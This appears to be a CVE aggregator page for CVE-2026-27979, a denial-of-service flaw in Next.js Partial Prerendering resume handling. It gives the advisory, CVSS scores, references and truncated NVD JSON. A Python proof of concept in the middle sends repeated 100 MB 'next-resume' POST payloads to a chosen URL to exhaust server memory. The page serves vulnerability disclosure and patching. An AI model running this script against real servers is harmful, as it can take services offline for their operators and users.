CVE-2026-27979

Description

Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, a request containing the `next-resume: 1` header (corresponding with a PPR resume request) would buffer request bodies without consistently enforcing `maxPostponedStateSize` in certain setups. The previous mitigation protected minimal-mode deployments, but equivalent non-minimal deployments remained vulnerable to the same unbounded postponed resume-body buffering behavior. In applications using the App Router with Partial Prerendering capability enabled (via `experimental.ppr` or `cacheComponents`), an attacker could send oversized `next-resume` POST payloads that were buffered without consistent size enforcement in non-minimal deployments, causing excessive memory usage and potential denial of service. This is fixed in version 16.1.7 by enforcing size limits across all postponed-body buffering paths and erroring when limits are exceeded. If upgrading is not immediately possible, block requests containing the `next-resume` header, as this is never valid to be sent from an untrusted client.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vercel:next.js:*:*:*:*:*:node.js:*:* - VULNERABLE

Next.js >= 16.0.1

Next.js < 16.1.7

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
CVE-2026-27979 PoC - Next.js PPR Resume Body Buffering DoS
This PoC demonstrates sending oversized next-resume POST requests
Note: Use only for authorized security testing
"""

import requests
import sys

TARGET_URL = "http://target-app.com/api/some-endpoint"

def send_malicious_request(url, payload_size_mb=50):
    """
    Send oversized next-resume request to trigger DoS
    """
    headers = {
        "Content-Type": "application/octet-stream",
        "next-resume": "1"  # Trigger PPR resume functionality
    }
    
    # Generate oversized payload
    oversized_payload = b"A" * (payload_size_mb * 1024 * 1024)
    
    try:
        print(f"[*] Sending malicious request with {payload_size_mb}MB payload...")
        print(f"[*] Target: {url}")
        print(f"[*] Header: next-resume: 1")
        
        response = requests.post(
            url,
            headers=headers,
            data=oversized_payload,
            timeout=30
        )
        
        print(f"[*] Response Status: {response.status_code}")
        return response
        
    except requests.exceptions.Timeout:
        print("[!] Request timeout - potential memory exhaustion")
        return None
    except Exception as e:
        print(f"[!] Error: {e}")
        return None

def check_vulnerability(url):
    """
    Check if target is vulnerable by observing memory behavior
    """
    print("[*] Testing for CVE-2026-27979 vulnerability...")
    
    # Send multiple oversized requests
    for i in range(3):
        print(f"\n[*] Request {i+1}/3")
        response = send_malicious_request(url, payload_size_mb=100)
        if response is None:
            print("[+] Target appears vulnerable - request failed/timeout")
            return True
    
    return False

if __name__ == "__main__":
    if len(sys.argv) > 1:
        TARGET_URL = sys.argv[1]
    check_vulnerability(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-27979
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-27979
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-27979/
[4] VulDB https://vuldb.com/cve/CVE-2026-27979
[5] https://github.com/vercel/next.js/commit/c885d4825f800dd1e49ead37274dcd08cdd6f3f1
[6] https://github.com/vercel/next.js/releases/tag/v16.1.7
[7] https://github.com/vercel/next.js/security/advisories/GHSA-h27x-g6w4-24gq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-27979", "sourceIdentifier": "[email protected]", "published": "2026-03-18T01:16:04.797", "lastModified": "2026-03-18T20:04:17.953", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Next.js is a React framework for building full-stack web applications. Starting in version 16.0.1 and prior to version 16.1.7, a request containing the `next-resume: 1` header (corresponding with a PPR resume request) would buffer request bodies without consistently enforcing `maxPostponedStateSize` in certain setups. The previous mitigation protected minimal-mode deployments, but equivalent non-minimal deployments remained vulnerable to the same unbounded postponed resume-body buffering behavior. In applications using the App Router with Partial Prerendering capability enabled (via `experimental.ppr` or `cacheComponents`), an attacker could send oversized `next-resume` POST payloads that were buffered without consistent size enforcement in non-minimal deployments, causing excessive memory usage and potential denial of service. This is fixed in version 16.1.7 by enforcing size limits across all postponed-body buffering paths and erroring when limits are exceeded. If upgrading is not immediately possible, block requests containing the `next-resume` header, as this is never valid to be sent from an untrusted client."}, {"lang": "es", "value": "Next.js es un React framework para construir aplicaciones web full-stack. A partir de la versión 16.0.1 y antes de la versión 16.1.7, una solicitud que contuviera el encabezado `next-resume: 1` (correspondiente a una solicitud de reanudación PPR) almacenaría en búfer los cuerpos de las solicitudes sin aplicar consistentemente `maxPostponedStateSize` en ciertas configuraciones. La mitigación anterior protegía las implementaciones en modo mínimo, pero las implementaciones no mínimas equivalentes seguían siendo vulnerables al mismo comportamiento de almacenamiento en búfer ilimitado del cuerpo de reanudación pospuesto. En aplicaciones que utilizan el App Router con la capacidad de Prerrenderizado Parcial habilitada (a través de `experimental.ppr` o `cacheComponents`), un atacante podría enviar cargas útiles POST `next-resume` sobredimensionadas que se almacenaban en búfer sin una aplicación consistente del tamaño en implementaciones no mínimas, causando un uso excesivo de memoria y una potencial denegación de servicio. Esto se corrige en la versión 16.1.7 al aplicar límites de tamaño en todas las rutas de almacenamiento en búfer de cuerpos pospuestos y generar un error cuando se exceden los límites. Si la actualización no es posible de inmediato, bloquee las solicitudes que contengan el encabezado `next-resume`, ya que nunca es válido que esto sea enviado desde un cliente no confiable."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-770"}]}], ... (truncated)